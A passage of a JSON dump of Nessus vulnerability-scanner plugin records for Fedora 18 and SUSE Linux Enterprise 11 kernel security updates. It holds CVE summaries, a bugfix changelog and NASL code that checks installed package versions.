"2013-07-12T00:00:00", "title": "Fedora 18 : kernel-3.9.9-201.fc18 (2013-12530)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-1059", "CVE-2013-2232"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:kernel"], "id": "FEDORA_2013-12530.NASL", "href": "https://www.tenable.com/plugins/nessus/67343", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-12530.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67343);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-1059\", \"CVE-2013-2232\", \"CVE-2013-2234\");\n script_bugtraq_id(60874, 60893, 60922);\n script_xref(name:\"FEDORA\", value:\"2013-12530\");\n\n script_name(english:\"Fedora 18 : kernel-3.9.9-201.fc18 (2013-12530)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream stable release, Linux v3.9.9. This also\nincludes fixes for issues running VM guests some people were seeing.\nUpdate to latest stable upstream release, Linux v3.9.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=977356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=980995\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=981552\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/111241.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?43b25d04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"kernel-3.9.9-201.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T14:40:37", "description": "The SUSE Linux Enterprise 11 Service Pack 2 kernel has been updated to\nversion 3.0.93 and includes various bug and security fixes.\n\nThe following security bugs have been fixed :\n\n - The fill_event_metadata function in\n fs/notify/fanotify/fanotify_user.c in the Linux kernel\n did not initialize a certain structure member, which\n allowed local users to obtain sensitive information from\n kernel memory via a read operation on the fanotify\n descriptor. (CVE-2013-2148)\n\n - The key_notify_policy_flush function in net/key/af_key.c\n in the Linux kernel did not initialize a certain\n structure member, which allowed local users to obtain\n sensitive information from kernel heap memory by reading\n a broadcast message from the notify_policy interface of\n an IPSec key_socket. (CVE-2013-2237)\n\n - The ip6_sk_dst_check function in net/ipv6/ip6_output.c\n in the Linux kernel allowed local users to cause a\n denial of service (system crash) by using an AF_INET6\n socket for a connection to an IPv4 interface.\n (CVE-2013-2232)\n\n - The (1) key_notify_sa_flush and (2)\n key_notify_policy_flush functions in net/key/af_key.c in\n the Linux kernel did not initialize certain structure\n members, which allowed local users to obtain sensitive\n information from kernel heap memory by reading a\n broadcast message from the notify interface of an IPSec\n key_socket. (CVE-2013-2234)\n\n - The udp_v6_push_pending_frames function in\n net/ipv6/udp.c in the IPv6 implementation in the Linux\n kernel made an incorrect function call for pending data,\n which allowed local users to cause a denial of service\n (BUG and system crash) via a crafted application that\n uses the UDP_CORK option in a setsockopt system call.\n (CVE-2013-4162)\n\n - net/ceph/auth_none.c in the Linux kernel allowed remote\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) or possibly have\n unspecified other impact via an auth_reply message that\n triggers an attempted build_request operation.\n (CVE-2013-1059)\n\n - The mmc_ioctl_cdrom_read_data function in\n drivers/cdrom/cdrom.c in the Linux kernel allowed local\n users to obtain sensitive information from kernel memory\n via a read operation on a malfunctioning CD-ROM drive.\n (CVE-2013-2164)\n\n - Format string vulnerability in the register_disk\n function in block/genhd.c in the Linux kernel allowed\n local users to gain privileges by leveraging root access\n and writing format string specifiers to\n /sys/module/md_mod/parameters/new_array in order to\n create a crafted /dev/md device name. (CVE-2013-2851)\n\n - The ip6_append_data_mtu function in\n net/ipv6/ip6_output.c in the IPv6 implementation in the\n Linux kernel did not properly maintain information about\n whether the IPV6_MTU setsockopt option had been\n specified, which allowed local users to cause a denial\n of service (BUG and system crash) via a crafted\n application that uses the UDP_CORK option in a\n setsockopt system call. (CVE-2013-4163)\n\n - Heap-based buffer overflow in the tg3_read_vpd function\n in drivers/net/ethernet/broadcom/tg3.c in the Linux\n kernel allowed physically proximate attackers to cause a\n denial of service (system crash) or possibly execute\n arbitrary code via crafted firmware that specifies a\n long string in the Vital Product Data (VPD) data\n structure. (CVE-2013-1929)\n\n - The _xfs_buf_find function in fs/xfs/xfs_buf.c in the\n Linux kernel did not validate block numbers, which\n allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have\n unspecified other impact by leveraging the ability to\n mount an XFS filesystem containing a metadata inode with\n an invalid extent map. (CVE-2013-1819)\n\n - The chase_port function in drivers/usb/serial/io_ti.c in\n the Linux kernel allowed local users to cause a denial\n of service (NULL pointer dereference and system crash)\n via an attempted /dev/ttyUSB read or write operation on\n a disconnected Edgeport USB serial converter.\n (CVE-2013-1774)\n\nAlso the following bugs have been fixed :\n\nBTRFS :\n\n - btrfs: merge contiguous regions when loading free space\n cache\n\n - btrfs: fix how we deal with the orphan block rsv\n\n - btrfs: fix wrong check during log recovery\n\n - btrfs: change how we indicate we are adding csums\n\n - btrfs: flush delayed inodes if we are short on space.\n (bnc#801427)\n\n - btrfs: rework shrink_delalloc. (bnc#801427)\n\n - btrfs: fix our overcommit math. (bnc#801427)\n\n - btrfs: delay block group item insertion. (bnc#801427)\n\n - btrfs: remove bytes argument from do_chunk_alloc.\n (bnc#801427)\n\n - btrfs: run delayed refs first when out of space.\n (bnc#801427)\n\n - btrfs: do not commit instead of overcommitting.\n (bnc#801427)\n\n - btrfs: do not take inode delalloc mutex if we are a free\n space inode. (bnc#801427)\n\n - btrfs: fix chunk allocation error handling. (bnc#801427)\n\n - btrfs: remove extent mapping if we fail to add chunk.\n (bnc#801427)\n\n - btrfs: do not overcommit if we do not have enough space\n for global rsv. (bnc#801427)\n\n - btrfs: rework the overcommit logic to be based on the\n total size. (bnc#801427)\n\n - btrfs: steal from global reserve if we are cleaning up\n orphans. (bnc#801427)\n\n - btrfs: clear chunk_alloc flag on retryable failure.\n (bnc#801427)\n\n - btrfs: use reserved space for creating a snapshot.\n (bnc#801427)\n\n - btrfs: cleanup to make the function\n btrfs_delalloc_reserve_metadata more logic. (bnc#801427)\n\n - btrfs: fix space leak when we fail to reserve metadata\n space. (bnc#801427)\n\n - btrfs: fix space accounting for unlink and rename.\n (bnc#801427)\n\n - btrfs: allocate new chunks if the space is not enough\n for global rsv. (bnc#801427)\n\n - btrfs: various abort cleanups. (bnc#812526 / bnc#801427)\n\n - btrfs: simplify unlink reservations (bnc#801427). \nOTHER :\n\n - x86: Add workaround to NMI iret woes. (bnc#831949)\n\n - x86: Do not schedule while still in NMI context.\n (bnc#831949)\n\n - bnx2x: Avoid sending multiple statistics queries.\n (bnc#814336)\n\n - bnx2x: protect different statistics flows. (bnc#814336)\n\n - futex: Take hugepages into account when generating\n futex_key.\n\n - drivers/hv: util: Fix a bug in version negotiation code\n for util services. (bnc#828714)\n\n - printk: Add NMI ringbuffer. (bnc#831949)\n\n - printk: extract ringbuffer handling from vprintk.\n (bnc#831949)\n\n - printk: NMI safe printk. (bnc#831949)\n\n - printk: Make NMI ringbuffer size independent on\n log_buf_len. (bnc#831949)\n\n - printk: Do not call console_unlock from nmi context.\n (bnc#831949)\n\n - printk: Do not use printk_cpu from finish_printk.\n (bnc#831949)\n\n - mlx4_en: Adding 40gb speed report for ethtool.\n (bnc#831410)\n\n - reiserfs: Fixed double unlock in reiserfs_setattr\n failure path.\n\n - reiserfs: delay reiserfs lock until journal\n initialization. (bnc#815320)\n\n - reiserfs: do not lock journal_init(). (bnc#815320)\n\n - reiserfs: locking, handle nested locks properly.\n (bnc#815320)\n\n - reiserfs: locking, push write lock out of xattr code.\n (bnc#815320)\n\n - reiserfs: locking, release lock around quota operations.\n (bnc#815320)\n\n - NFS: support 'nosharetransport' option (bnc#807502,\n bnc#828192, FATE#315593).\n\n - dm mpath: add retain_attached_hw_handler feature.\n (bnc#760407)\n\n - scsi_dh: add scsi_dh_attached_handler_name. (bnc#760407)\n\n - bonding: disallow change of MAC if fail_over_mac\n enabled. (bnc#827376)\n\n - bonding: propagate unicast lists down to slaves.\n (bnc#773255 / bnc#827372)\n\n - bonding: emit address change event also in bond_release.\n (bnc#773255 / bnc#827372)\n\n - bonding: emit event when bonding changes MAC.\n (bnc#773255 / bnc#827372)\n\n - SUNRPC: Ensure we release the socket write lock if the\n rpc_task exits early. (bnc#830901)\n\n - ext4: force read-only unless rw=1 module option is used\n (fate#314864).\n\n - HID: fix unused rsize usage. (bnc#783475)\n\n - HID: fix data access in implement(). (bnc#783475)\n\n - xfs: fix deadlock in xfs_rtfree_extent with kernel v3.x.\n (bnc#829622)\n\n - r8169: allow multicast packets on sub-8168f chipset.\n (bnc#805371)\n\n - r8169: support new chips of RTL8111F. (bnc#805371)\n\n - r8169: define the early size for 8111evl. (bnc#805371)\n\n - r8169: fix the reset setting for 8111evl. (bnc#805371)\n\n - r8169: add MODULE_FIRMWARE for the firmware of 8111evl.\n (bnc#805371)\n\n - r8169: fix sticky accepts packet bits in RxConfig.\n (bnc#805371)\n\n - r8169: adjust the RxConfig settings. (bnc#805371)\n\n - r8169: support RTL8111E-VL. (bnc#805371)\n\n - r8169: add ERI functions. (bnc#805371)\n\n - r8169: modify the flow of the hw reset. (bnc#805371)\n\n - r8169: adjust some registers. (bnc#805371)\n\n - r8169: check firmware content sooner. (bnc#805371)\n\n - r8169: support new firmware format. (bnc#805371)\n\n - r8169: explicit firmware format check. (bnc#805371)\n\n - r8169: move the firmware down into the device private\n data. (bnc#805371)\n\n - mm: link_mem_sections make sure nmi watchdog does not\n trigger while linking memory sections. (bnc#820434)\n\n - kernel: lost IPIs on CPU hotplug (bnc#825048,\n LTC#94784).\n\n - iwlwifi: use correct supported firmware for 6035 and\n 6000g2. (bnc#825887)\n\n - watchdog: Update watchdog_thresh atomically.\n (bnc#829357)\n\n - watchdog: update watchdog_tresh properly. (bnc#829357)\n\n - watchdog:\n watchdog-make-disable-enable-hotplug-and-preempt-save.pa\n tch. (bnc#829357)\n\n - include/1/smp.h: define __smp_call_function_single for\n !CONFIG_SMP. (bnc#829357)\n\n - lpfc: Return correct error code on bsg_timeout.\n (bnc#816043)\n\n - dm-multipath: Drop table when retrying ioctl.\n (bnc#808940)\n\n - scsi: Do not retry invalid function error. (bnc#809122)\n\n - scsi: Always retry internal target error. (bnc#745640,\n bnc#825227)\n\n - ibmvfc: Driver version 1.0.1. (bnc#825142)\n\n - ibmvfc: Fix for offlining devices during error recovery.\n (bnc#825142)\n\n - ibmvfc: Properly set cancel flags when cancelling abort.\n (bnc#825142)\n\n - ibmvfc: Send cancel when link is down. (bnc#825142)\n\n - ibmvfc: Support FAST_IO_FAIL in EH handlers.\n (bnc#825142)\n\n - ibmvfc: Suppress ABTS if target gone. (bnc#825142)\n\n - fs/dcache.c: add cond_resched() to\n shrink_dcache_parent(). (bnc#829082)\n\n - kmsg_dump: do not run on non-error paths by default.\n (bnc#820172)\n\n - mm: honor min_free_kbytes set by user. (bnc#826960)\n\n - hyperv: Fix a kernel warning from\n netvsc_linkstatus_callback(). (bnc#828574)\n\n - RT: Fix up hardening patch to not gripe when avg >\n available, which lockless access makes possible and\n happens in -rt kernels running a cpubound ltp realtime\n testcase. Just keep the output sane in that case.\n\n - md/raid10: Fix two bug affecting RAID10 reshape (-).\n\n - Allow NFSv4 to run execute-only files. (bnc#765523)\n\n - fs/ocfs2/namei.c: remove unnecessary ERROR when removing\n non-empty directory. (bnc#819363)\n\n - block: Reserve only one queue tag for sync IO if only 3\n tags are available. (bnc#806396)\n\n - drm/i915: Add wait_for in init_ring_common. (bnc#813604)\n\n - drm/i915: Mark the ringbuffers as being in the GTT\n domain. (bnc#813604)\n\n - ext4: avoid hang when mounting non-journal filesystems\n with orphan list. (bnc#817377)\n\n - autofs4 - fix get_next_positive_subdir(). (bnc#819523)\n\n - ocfs2: Add bits_wanted while calculating credits in\n ocfs2_calc_extend_credits. (bnc#822077)\n\n - re-enable io tracing. (bnc#785901)\n\n - SUNRPC: Prevent an rpc_task wakeup race. (bnc#825591)\n\n - tg3: Prevent system hang during repeated EEH errors.\n (bnc#822066)\n\n - backends: Check for insane amounts of requests on the\n ring.\n\n - Update Xen patches to 3.0.82.\n\n - netiucv: Hold rtnl between name allocation and device\n registration. (bnc#824159)\n\n - drm/edid: Do not print messages regarding stereo or\n csync by default. (bnc#821235)\n\n - net/sunrpc: xpt_auth_cache should be ignored when\n expired. (bnc#803320)\n\n - sunrpc/cache: ensure items removed from cache do not\n have pending upcalls. (bnc#803320)\n\n - sunrpc/cache: remove races with queuing an upcall.\n (bnc#803320)\n\n - sunrpc/cache: use cache_fresh_unlocked consistently and\n correctly. (bnc#803320)\n\n - md/raid10 'enough' fixes. (bnc#773837)\n\n - Update config files: disable IP_PNP. (bnc#822825)\n\n - Disable efi pstore by default. (bnc#804482 / bnc#820172)\n\n - md: Fix problem with GET_BITMAP_FILE returning wrong\n status. (bnc#812974 / bnc#823497)\n\n - USB: xHCI: override bogus bulk wMaxPacketSize values.\n (bnc#823082)\n\n - ALSA: hda - Fix system panic when DMA > 40 bits for\n Nvidia audio controllers. (bnc#818465)\n\n - USB: UHCI: fix for suspend of virtual HP controller.\n (bnc#817035)\n\n - mm: mmu_notifier: re-fix freed page still mapped in\n secondary MMU. (bnc#821052)", "edition": 18, "published": "2013-09-21T00:00:00", "title": "SuSE 11.2 Security Update : Linux kernel (SAT Patch Numbers 8263 / 8265 / 8273)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-1819", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-2148", "CVE-2013-1774", "CVE-2013-1929", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2237", "CVE-2013-2164"], "modified": "2013-09-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:11:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:11:kernel-source", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:11:kernel-ec2", "p-cpe:/a:novell:suse_linux:11:kernel-trace-base", "p-cpe:/a:novell:suse_linux:11:kernel-default-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae-base", "p-cpe:/a:novell:suse_linux:11:kernel-pae", "p-cpe:/a:novell:suse_linux:11:xen-kmp-trace", "p-cpe:/a:novell:suse_linux:11:kernel-xen-base", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:kernel-xen", "p-cpe:/a:novell:suse_linux:11:kernel-trace", "p-cpe:/a:novell:suse_linux:11:kernel-syms", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:11:kernel-trace-extra", "p-cpe:/a:novell:suse_linux:11:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:11:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default-devel", "p-cpe:/a:novell:suse_linux:11:kernel-default-man", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:kernel-default-extra", "p-cpe:/a:novell:suse_linux:11:kernel-default", "p-cpe:/a:novell:suse_linux:11:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "id": "SUSE_11_KERNEL-130827.NASL", "href": "https://www.tenable.com/plugins/nessus/70039", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70039);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1059\", \"CVE-2013-1774\", \"CVE-2013-1819\", \"CVE-2013-1929\", \"CVE-2013-2148\", \"CVE-2013-2164\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-2237\", \"CVE-2013-2851\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n\n script_name(english:\"SuSE 11.2 Security Update : Linux kernel (SAT Patch Numbers 8263 / 8265 / 8273)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 Service Pack 2 kernel has been updated to\nversion 3.0.93 and includes various bug and security fixes.\n\nThe following security bugs have been fixed :\n\n - The fill_event_metadata function in\n fs/notify/fanotify/fanotify_user.c in the Linux kernel\n did not initialize a certain structure member, which\n allowed local users to obtain sensitive information from\n kernel memory via a read operation on the fanotify\n descriptor. (CVE-2013-2148)\n\n - The key_notify_policy_flush function in net/key/af_key.c\n in the Linux kernel did not initialize a certain\n structure member, which allowed local users to obtain\n sensitive information from kernel heap memory by reading\n a broadcast message from the notify_policy interface of\n an IPSec key_socket. (CVE-2013-2237)\n\n - The ip6_sk_dst_check function in net/ipv6/ip6_output.c\n in the Linux kernel allowed local users to cause a\n denial of service (system crash) by using an AF_INET6\n socket for a connection to an IPv4 interface.\n (CVE-2013-2232)\n\n - The (1) key_notify_sa_flush and (2)\n key_notify_policy_flush functions in net/key/af_key.c in\n the Linux kernel did not initialize certain structure\n members, which allowed local users to obtain sensitive\n information from kernel heap memory by reading a\n broadcast message from the notify interface of an IPSec\n key_socket. (CVE-2013-2234)\n\n - The udp_v6_push_pending_frames function in\n net/ipv6/udp.c in the IPv6 implementation in the Linux\n kernel made an incorrect function call for pending data,\n which allowed local users to cause a denial of service\n (BUG and system crash) via a crafted application that\n uses the UDP_CORK option in a setsockopt system call.\n (CVE-2013-4162)\n\n - net/ceph/auth_none.c in the Linux kernel allowed remote\n attackers to cause a denial of service (NULL pointer\n dereference and system crash) or possibly have\n unspecified other impact via an auth_reply message that\n triggers an attempted build_request operation.\n (CVE-2013-1059)\n\n - The mmc_ioctl_cdrom_read_data function in\n drivers/cdrom/cdrom.c in the Linux kernel allowed local\n users to obtain sensitive information from kernel memory\n via a read operation on a malfunctioning CD-ROM drive.\n (CVE-2013-2164)\n\n - Format string vulnerability in the register_disk\n function in block/genhd.c in the Linux kernel allowed\n local users to gain privileges by leveraging root access\n and writing format string specifiers to\n /sys/module/md_mod/parameters/new_array in order to\n create a crafted /dev/md device name. (CVE-2013-2851)\n\n - The ip6_append_data_mtu function in\n net/ipv6/ip6_output.c in the IPv6 implementation in the\n Linux kernel did not properly maintain information about\n whether the IPV6_MTU setsockopt option had been\n specified, which allowed local users to cause a denial\n of service (BUG and system crash) via a crafted\n application that uses the UDP_CORK option in a\n setsockopt system call. (CVE-2013-4163)\n\n - Heap-based buffer overflow in the tg3_read_vpd function\n in drivers/net/ethernet/broadcom/tg3.c in the Linux\n kernel allowed physically proximate attackers to cause a\n denial of service (system crash) or possibly execute\n arbitrary code via crafted firmware that specifies a\n long string in the Vital Product Data (VPD) data\n structure. (CVE-2013-1929)\n\n - The _xfs_buf_find function in fs/xfs/xfs_buf.c in the\n Linux kernel did not validate block numbers, which\n allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have\n unspecified other impact by leveraging the ability to\n mount an XFS filesystem containing a metadata inode with\n an invalid extent map. (CVE-2013-1819)\n\n - The chase_port function in drivers/usb/serial/io_ti.c in\n the Linux kernel allowed local users to cause a denial\n of service (NULL pointer dereference and system crash)\n via an attempted /dev/ttyUSB read or write operation on\n a disconnected Edgeport USB serial converter.\n (CVE-2013-1774)\n\nAlso the following bugs have been fixed :\n\nBTRFS :\n\n - btrfs: merge contiguous regions when loading free space\n cache\n\n - btrfs: fix how we deal with the orphan block rsv\n\n - btrfs: fix wrong check during log recovery\n\n - btrfs: change how we indicate we are adding csums\n\n - btrfs: flush delayed inodes if we are short on space.\n (bnc#801427)\n\n - btrfs: rework shrink_delalloc. (bnc#801427)\n\n - btrfs: fix our overcommit math. (bnc#801427)\n\n - btrfs: delay block group item insertion. (bnc#801427)\n\n - btrfs: remove bytes argument from do_chunk_alloc.\n (bnc#801427)\n\n - btrfs: run delayed refs first when out of space.\n (bnc#801427)\n\n - btrfs: do not commit instead of overcommitting.\n (bnc#801427)\n\n - btrfs: do not take inode delalloc mutex if we are a free\n space inode. (bnc#801427)\n\n - btrfs: fix chunk allocation error handling. (bnc#801427)\n\n - btrfs: remove extent mapping if we fail to add chunk.\n (bnc#801427)\n\n - btrfs: do not overcommit if we do not have enough space\n for global rsv. (bnc#801427)\n\n - btrfs: rework the overcommit logic to be based on the\n total size. (bnc#801427)\n\n - btrfs: steal from global reserve if we are cleaning up\n orphans. (bnc#801427)\n\n - btrfs: clear chunk_alloc flag on retryable failure.\n (bnc#801427)\n\n - btrfs: use reserved space for creating a snapshot.\n (bnc#801427)\n\n - btrfs: cleanup to make the function\n btrfs_delalloc_reserve_metadata more logic. (bnc#801427)\n\n - btrfs: fix space leak when we fail to reserve metadata\n space. (bnc#801427)\n\n - btrfs: fix space accounting for unlink and rename.\n (bnc#801427)\n\n - btrfs: allocate new chunks if the space is not enough\n for global rsv. (bnc#801427)\n\n - btrfs: various abort cleanups. (bnc#812526 / bnc#801427)\n\n - btrfs: simplify unlink reservations (bnc#801427). \nOTHER :\n\n - x86: Add workaround to NMI iret woes. (bnc#831949)\n\n - x86: Do not schedule while still in NMI context.\n (bnc#831949)\n\n - bnx2x: Avoid sending multiple statistics queries.\n (bnc#814336)\n\n - bnx2x: protect different statistics flows. (bnc#814336)\n\n - futex: Take hugepages into account when generating\n futex_key.\n\n - drivers/hv: util: Fix a bug in version negotiation code\n for util services. (bnc#828714)\n\n - printk: Add NMI ringbuffer. (bnc#831949)\n\n - printk: extract ringbuffer handling from vprintk.\n (bnc#831949)\n\n - printk: NMI safe printk. (bnc#831949)\n\n - printk: Make NMI ringbuffer size independent on\n log_buf_len. (bnc#831949)\n\n - printk: Do not call console_unlock from nmi context.\n (bnc#831949)\n\n - printk: Do not use printk_cpu from finish_printk.\n (bnc#831949)\n\n - mlx4_en: Adding 40gb speed report for ethtool.\n (bnc#831410)\n\n - reiserfs: Fixed double unlock in reiserfs_setattr\n failure path.\n\n - reiserfs: delay reiserfs lock until journal\n initialization. (bnc#815320)\n\n - reiserfs: do not lock journal_init(). (bnc#815320)\n\n - reiserfs: locking, handle nested locks properly.\n (bnc#815320)\n\n - reiserfs: locking, push write lock out of xattr code.\n (bnc#815320)\n\n - reiserfs: locking, release lock around quota operations.\n (bnc#815320)\n\n - NFS: support 'nosharetransport' option (bnc#807502,\n bnc#828192, FATE#315593).\n\n - dm mpath: add retain_attached_hw_handler feature.\n (bnc#760407)\n\n - scsi_dh: add scsi_dh_attached_handler_name. (bnc#760407)\n\n - bonding: disallow change of MAC if fail_over_mac\n enabled. (bnc#827376)\n\n - bonding: propagate unicast lists down to slaves.\n (bnc#773255 / bnc#827372)\n\n - bonding: emit address change event also in bond_release.\n (bnc#773255 / bnc#827372)\n\n - bonding: emit event when bonding changes MAC.\n (bnc#773255 / bnc#827372)\n\n - SUNRPC: Ensure we release the socket write lock if the\n rpc_task exits early. (bnc#830901)\n\n - ext4: force read-only unless rw=1 module option is used\n (fate#314864).\n\n - HID: fix unused rsize usage. (bnc#783475)\n\n - HID: fix data access in implement(). (bnc#783475)\n\n - xfs: fix deadlock in xfs_rtfree_extent with kernel v3.x.\n (bnc#829622)\n\n - r8169: allow multicast packets on sub-8168f chipset.\n (bnc#805371)\n\n - r8169: support new chips of RTL8111F. (bnc#805371)\n\n - r8169: define the early size for 8111evl. (bnc#805371)\n\n - r8169: fix the reset setting for 8111evl. (bnc#805371)\n\n - r8169: add MODULE_FIRMWARE for the firmware of 8111evl.\n (bnc#805371)\n\n - r8169: fix sticky accepts packet bits in RxConfig.\n (bnc#805371)\n\n - r8169: adjust the RxConfig settings. (bnc#805371)\n\n - r8169: support RTL8111E-VL. (bnc#805371)\n\n - r8169: add ERI functions. (bnc#805371)\n\n - r8169: modify the flow of the hw reset. (bnc#805371)\n\n - r8169: adjust some registers. (bnc#805371)\n\n - r8169: check firmware content sooner. (bnc#805371)\n\n - r8169: support new firmware format. (bnc#805371)\n\n - r8169: explicit firmware format check. (bnc#805371)\n\n - r8169: move the firmware down into the device private\n data. (bnc#805371)\n\n - mm: link_mem_sections make sure nmi watchdog does not\n trigger while linking memory sections. (bnc#820434)\n\n - kernel: lost IPIs on CPU hotplug (bnc#825048,\n LTC#94784).\n\n - iwlwifi: use correct supported firmware for 6035 and\n 6000g2. (bnc#825887)\n\n - watchdog: Update watchdog_thresh atomically.\n (bnc#829357)\n\n - watchdog: update watchdog_tresh properly. (bnc#829357)\n\n - watchdog:\n watchdog-make-disable-enable-hotplug-and-preempt-save.pa\n tch. (bnc#829357)\n\n - include/1/smp.h: define __smp_call_function_single for\n !CONFIG_SMP. (bnc#829357)\n\n - lpfc: Return correct error code on bsg_timeout.\n (bnc#816043)\n\n - dm-multipath: Drop table when retrying ioctl.\n (bnc#808940)\n\n - scsi: Do not retry invalid function error. (bnc#809122)\n\n - scsi: Always retry internal target error. (bnc#745640,\n bnc#825227)\n\n - ibmvfc: Driver version 1.0.1. (bnc#825142)\n\n - ibmvfc: Fix for offlining devices during error recovery.\n (bnc#825142)\n\n - ibmvfc: Properly set cancel flags when cancelling abort.\n (bnc#825142)\n\n - ibmvfc: Send cancel when link is down. (bnc#825142)\n\n - ibmvfc: Support FAST_IO_FAIL in EH handlers.\n (bnc#825142)\n\n - ibmvfc: Suppress ABTS if target gone. (bnc#825142)\n\n - fs/dcache.c: add cond_resched() to\n shrink_dcache_parent(). (bnc#829082)\n\n - kmsg_dump: do not run on non-error paths by default.\n (bnc#820172)\n\n - mm: honor min_free_kbytes set by user. (bnc#826960)\n\n - hyperv: Fix a kernel warning from\n netvsc_linkstatus_callback(). (bnc#828574)\n\n - RT: Fix up hardening patch to not gripe when avg >\n available, which lockless access makes possible and\n happens in -rt kernels running a cpubound ltp realtime\n testcase. Just keep the output 